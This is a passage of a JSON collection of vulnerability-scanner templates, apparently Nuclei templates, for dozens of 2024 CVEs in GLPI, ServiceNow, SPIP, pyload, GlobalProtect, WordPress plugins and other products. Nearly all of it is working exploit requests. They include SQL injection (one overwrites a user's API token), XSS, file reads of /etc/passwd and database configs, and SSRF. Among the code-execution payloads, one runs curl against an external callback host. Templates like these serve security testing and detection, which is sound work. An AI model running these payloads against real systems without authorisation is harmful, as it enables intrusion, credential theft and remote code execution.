/process/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}\n","GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"attack":"pitchfork","payloads":{"username":["admin"],"password":["admin"]},"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains_all(body_2, \"<script>alert(document.domain)</script>\", \"SOPlanning\")"],"condition":"and"}]}]},{"id":"CVE-2024-29889","info":{"name":"GLPI 10.0.10-10.0.14 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /index.php?noAUTO=1 HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"fieldlogin","part":"body","group":1,"regex":["id=\"login_name\" name=\"([a-z0-9]+)"],"internal":true},{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)"],"internal":true},{"type":"regex","name":"fieldpassword","part":"body","group":1,"regex":["id=\"login_password\" name=\"([0-9a-z]+)"],"internal":true}]},{"raw":["POST /front/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnoAUTO=1&redirect=&_glpi_csrf_token={{csrf}}&{{fieldlogin}}={{username}}&{{fieldpassword}}={{password}}&auth=local&submit=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(location,'front/central.php')"],"condition":"and","internal":true}]},{"raw":["GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"id","part":"body","group":1,"regex":["type='hidden' name='id' value='([0-9]+)'"],"internal":true}]},{"raw":["GET /front/preference.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf2","part":"body","group":1,"regex":["type=\"hidden\" name=\"_glpi_csrf_token\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /front/preference.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryRNyVHuSeiTMi2G7K\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"savedsearches_pinned\"\n\n{\"exploit\":\"',api_token='{{randstr}}' where id={{id}};-- -\"}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_glpi_csrf_token\"\n\n{{csrf2}}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"name\"\n\nglpi\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"id\"\n\n{{id}}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"realname\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_uploader_picture[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_blank_picture\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"firstname\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"language\"\n\nen_US\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"password\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"password2\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"phone\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_useremails[-1]\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"mobile\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"phone2\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"registration_number\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"locations_id\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"use_mode\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_reset_api_token\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"update\"\n\nSave\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302"],"condition":"and","internal":true}]},{"raw":["GET /front/preference.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf3","part":"body","group":1,"regex":["type=\"hidden\" name=\"_glpi_csrf_token\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /ajax/pin_savedsearches.php HTTP/1.1\nHost: {{Hostname}}\nX-Glpi-Csrf-Token: {{csrf3}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nitemtype=Monitor\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body,\"\\\"success\\\":true\")"],"condition":"and","internal":true}]},{"raw":["GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body,\"name=\\\"_api_token\\\" value=\\\"{{randstr}}\")"],"condition":"and"}]}]},{"id":"CVE-2024-3742","info":{"name":"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure","severity":"high"},"requests":[{"raw":["GET /controlloLogin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"application/x-javascript\")","contains(body, \"user==\") && contains(body, \"password==\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","regex":["user\\s*==\\s*'([^']*)'\\s*&&\\s*password\\s*==\\s*'([^']*)'"]}]}]},{"id":"CVE-2024-5217","info":{"name":"ServiceNow - Incomplete Input Validation","severity":"critical"},"requests":[{"raw":["GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j=\"jelly:core\"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File(\"\").getAbsolutePath();z=z.substring(0,z.lastIndexOf(\"/\"));u=new+SecurelyAccess(z.concat(\"/co..nf/glide.db.properties\")).getBufferedReader();s=\"\";while((q=u.readLine())!==null)s=s.concat(q,\"\\n\");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["glide.db.user"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3552","info":{"name":"Web Directory Free < 1.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/web-directory-free"],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=w2dc_get_map_marker_info&locations_ids[]=(select+if(1=1,sleep(6),0)+from+(select+1)x)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","regex('^\\[\\]$', body)"],"condition":"and"}]}]},{"id":"CVE-2024-34351","info":{"name":"Next.js - Server Side Request Forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}","{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["The requested resource isn't a valid image"]}]}]},{"id":"CVE-2024-7954","info":{"name":"SPIP Porte Plume Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?action=porte_plume_previsu HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndata=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["Composed-By: SPIP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-34470","info":{"name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mailinspector/login.php"],"host-redirects":true,"matchers":[{"type":"word","part":"body","words":["Licensed to HSC TREINAMENTO"]}]},{"method":"GET","path":["{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6842","info":{"name":"AnythingLLM - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/setup-complete"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"AuthToken\\\":true\", \"ApiKey\\\":true\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"},{"type":"word","part":"body","words":["\"AgentGoogleSearchEngineId\":","-\"AgentGoogleSearchEngineKey\":'","\"AgentSerperApiKey\":","\"AgentBingSearchApiKey\":"],"condition":"or"}]}]},{"id":"CVE-2024-31851","info":{"name":"CData Sync < 23.4.8843 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData - Sync"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0337","info":{"name":"Travelpayouts <= 1.1.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?travelpayouts_redirect=https://oast.me"],"redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-43917","info":{"name":"WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"extractors":[{"type":"regex","part":"body","internal":true,"name":"nonce","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\""]}]},{"raw":["GET /product-category/uncategorized/ HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","internal":true,"name":"product_id","group":1,"regex":["data-tinvwl_product_id=\"([0-9]+)\""]}],"matchers":[{"type":"word","part":"body","words":["data-tinvwl_product_id=\""],"internal":true}]},{"raw":["POST /product-category/uncategorized/ HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"form[tinvwl-hidden-fields]\"\n\n[]\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"tinv_wishlist_id\"\n\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"tinv_wishlist_name\"\n\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_type\"\n\nsimple\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_id\"\n\n{{product_id}}\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_variation\"\n\n0\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_action\"\n\naddto\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"redirect\"\n\n{{RootURL}}/product-category/uncategorized/\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG--\n"],"extractors":[{"type":"json","part":"body","name":"share_key","internal":true,"json":[".wishlist.share_key"]}]},{"raw":["@timeout: 20s\nGET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, 'application/json')","contains(body, 'product_id')"],"condition":"and"}]}]},{"id":"CVE-2024-35584","info":{"name":"openSIS < 9.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","@timeout 20s\nGET /Ajax.php?modname=tools/notallowed.php HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 122.122.122.122' AND SLEEP(7) AND '1'='1\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","contains(body_1, \"openSIS\") && contains_all(body_2, \"donetext:\", \"\\'Done\\'\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1698","info":{"name":"NotificationX <= 2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-json/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"nx_id\": \"1\",\"type\": \"clicks`=1 and 1=sleep(5)-- -\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"{\\\"success\\\":true}\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2024-25669","info":{"name":"CaseAware a360inc - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=test%27%20draggable=true%20ondrag=alert(document.domain)%20value=%27p"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value='test' draggable=true ondrag=alert(document.domain)","CaseAware"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28397","info":{"name":"pyload-ng js2py - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npackage=pkg&crypted=MTIzNA%3D%3D&jk=%0A//%20%5B%2B%5D%20command%20goes%20here%3A%0Alet%20cmd%20%3D%20%22curl%20http%3A//{{interactsh-url}}%22%0Alet%20hacked%2C%20bymarve%2C%20n11%0Alet%20getattr%2C%20obj%0A%0Ahacked%20%3D%20Object.getOwnPropertyNames%28%7B%7D%29%0Abymarve%20%3D%20hacked.__getattribute__%0An11%20%3D%20bymarve%28%22__getattribute__%22%29%0Aobj%20%3D%20n11%28%22__class__%22%29.__base__%0Agetattr%20%3D%20obj.__getattribute__%0A%0Afunction%20findpopen%28o%29%20%7B%0A%20%20%20%20let%20result%3B%0A%20%20%20%20for%28let%20i%20in%20o.__subclasses__%28%29%29%20%7B%0A%20%20%20%20%20%20%20%20let%20item%20%3D%20o.__subclasses__%28%29%5Bi%5D%0A%20%20%20%20%20%20%20%20if%28item.__module__%20%3D%3D%20%22subprocess%22%20%26%26%20item.__name__%20%3D%3D%20%22Popen%22%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20item%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%28item.__name__%20%21%3D%20%22type%22%20%26%26%20%28result%20%3D%20findpopen%28item%29%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20result%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%7D%0A%0An11%20%3D%20findpopen%28obj%29%28cmd%2C%20-1%2C%20null%2C%20-1%2C%20-1%2C%20-1%2C%20null%2C%20null%2C%20true%29.communicate%28%29%0Aconsole.log%28n11%29%0Afunction%20f%28%29%20%7B%0A%20%20%20%20return%20n11%0A%7D%0A%0A"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Could not decrypt key"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2024-38514","info":{"name":"NextChat - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["__NEXT_DATA__"]}]}]},{"id":"CVE-2024-30188","info":{"name":"Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write","severity":"high"},"requests":[{"raw":["POST /dolphinscheduler/login HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&userPassword={{password}}&ssoLoginUrl="],"extractors":[{"type":"json","name":"sessionId","part":"body","json":[".data.sessionId"],"internal":true}]},{"raw":["GET /dolphinscheduler/resources/download?fullName=file:///etc/passwd  HTTP/1.1\nHost: {{Hostname}}\nsessionId: {{sessionId}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6928","info":{"name":"Opti Marketing <= 2.0.9 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/opti-marketing\")"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=save_article&postId=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6188","info":{"name":"TrakSYS 11.x.x - Sensitive Data Exposure","severity":"medium"},"requests":[{"raw":["GET /TS/export/pagedefinition?ID=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["TrakSYS Version","Name","Altname"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2879","info":{"name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css"],"matchers":[{"type":"word","internal":true,"words":[".ls-clearfix:before"]}]},{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"<script>\")"],"condition":"and"}]}]},{"id":"CVE-2024-0204","info":{"name":"Fortra GoAnywhere MFT - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Create an administrator account","goanywhere"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29059","info":{"name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","severity":"high"},"requests":[{"raw":["GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1\nHost: {{Hostname}}\n__RequestVerb: POST\nContent-Type: text/xml\n","POST {{objref}} HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml\n\n<SOAP-ENV:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:clr=\"http://schemas.microsoft.com/soap/encoding/clr/1.0\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<a1:TextFormattingRunProperties id=\"ref-1\" xmlns:a1=\"http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35\">\n<ForegroundBrush id=\"ref-3\">&#60;ObjectDataProvider MethodName=&#34;AddHeader&#34;\n  xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34;\n  xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;\n  xmlns:System=&#34;clr-namespace:System;assembly=mscorlib&#34;\n  xmlns:System.Web=&#34;clr-namespace:System.Web;assembly=System.Web&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;&#60;ObjectDataProvider MethodName=&#34;get_Response&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;\n  &#60;ObjectDataProvider ObjectType=&#34;{x:Type System.Web:HttpContext}&#34; MethodName=&#34;get_Current&#34; /&#62;\n  &#60;/ObjectDataProvider.ObjectInstance&#62;\n  &#60;/ObjectDataProvider&#62;\n  &#60;/ObjectDataProvider.ObjectInstance&#62;\n  &#60;ObjectDataProvider.MethodParameters&#62;\n  &#60;System:String&#62;X-Vuln-Test&#60;/System:String&#62;\n  &#60;System:String&#62;{{randstr}}&#60;/System:String&#62;\n  &#60;/ObjectDataProvider.MethodParameters&#62;\n&#60;/ObjectDataProvider&#62;</ForegroundBrush>\n</a1:TextFormattingRunProperties>\n</SOAP-ENV:Envelope>\n"],"extractors":[{"type":"regex","name":"objref","part":"body_1","group":1,"regex":["(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"],"internal":true},{"type":"dsl","dsl":["x_vuln_test"]}],"matchers":[{"type":"dsl","dsl":["contains(body_1,'ObjRef')","contains(x_vuln_test,'{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2024-41107","info":{"name":"Apache CloudStack - SAML Signature Exclusion","severity":"critical"},"requests":[{"raw":["POST /client/api?command=samlSso HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nRelayState=undefined&SAMLResponse={{urlencode(base64(saml))}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header,'sessionkey')","contains(content_type,'text/xml')","status_code==302"],"condition":"and"}]}]},{"id":"CVE-2024-5488","info":{"name":"SEOPress < 7.9 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["Sorry, you are not allowed to do that."],"internal":true}]},{"raw":["PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username+':aaaaaa')}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{marker}}&description={{marker}}\n"],"matchers":[{"type":"word","part":"body","words":["\"code\":\"success\""],"internal":true}]},{"raw":["GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["\"title\":\"{{marker}}\",\"description\":\"{{marker}}\""]}]}]},{"id":"CVE-2024-37393","info":{"name":"SecurEnvoy Two Factor Authentication - LDAP Injection","severity":"critical"},"requests":[{"raw":["POST /secserver/? HTTP/2\nHost: {{Hostname}}\n\nFLAG=DESKTOP\n1\nSTATUS:INIT\nUSERID:{{userid}})(sAMAccountName=*\nMEMBEROF:Domain Users\n","POST /secserver/? HTTP/2\nHost: {{Hostname}}\n\nFLAG=DESKTOP\n1\nSTATUS:INIT\nUSERID:*)(sAMAccountName=*\nMEMBEROF:Domain Users\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, 'Error checking Group')","status_code_1 == 200","contains(body_2, 'GETPASSCODE')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-24565","info":{"name":"CrateDB Database - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"CREATE TABLE {{table_name}}(info_leak STRING)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"SELECT * FROM {{table_name}} limit 100\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_3)","contains_all(header, 'application/json')","status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-49757","info":{"name":"Zitadel - User Registration Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/login/register"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Registration is not allowed (Internal)"],"negative":true},{"type":"word","part":"body","words":["Enter your Userdata","zitadel"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-45440","info":{"name":"Drupal 11.x-dev - Full Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/core/authorize.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["getHashSalt","RuntimeException"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25735","info":{"name":"WyreStorm Apollo VX20 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/device/config"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"password\":","\"softAp\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4443","info":{"name":"Business Directory Plugin <= 6.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1]= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"Business Directory\",\"No listings found\")"],"condition":"and"}]}]},{"id":"CVE-2024-29868","info":{"name":"Apache StreamPipes <= 0.93.0 - Use of Cryptographically Weak PRNG in Recovery Token Generation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/streampipes-backend/api/v2/auth/settings"],"headers":{"User-Agent":"{{randstr}}"},"extractors":[{"type":"json","part":"body","name":"settings","group":1,"json":["if .allowPasswordRecovery==true and .allowSelfRegistration==true then true else false end"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/streampipes-backend/api/openapi.json"],"headers":{"User-Agent":"{{randstr}}"},"extractors":[{"type":"json","part":"body","name":"version","group":1,"json":[".info.version"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains(settings, true)","compare_versions(version, '>= 0.69.0') && compare_versions(version, '<= 0.93.0')"],"condition":"and"}]}]},{"id":"CVE-2024-3400","info":{"name":"GlobalProtect - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n","POST /ssl-vpn/hipreport.esp HTTP/1.1\nHost: {{Hostname}}\nCookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt;\nContent-Type: application/x-www-form-urlencoded\n\nuser=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global\n","GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_3 == 403","contains(body_2, 'invalid required input parameters')"],"condition":"and"}]}]},{"id":"CVE-2024-45216","info":{"name":"Apache Solr - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /solr/admin/info/properties:/admin/info/key HTTP/1.1\nHost: {{Hostname}}\nSolrAuth: 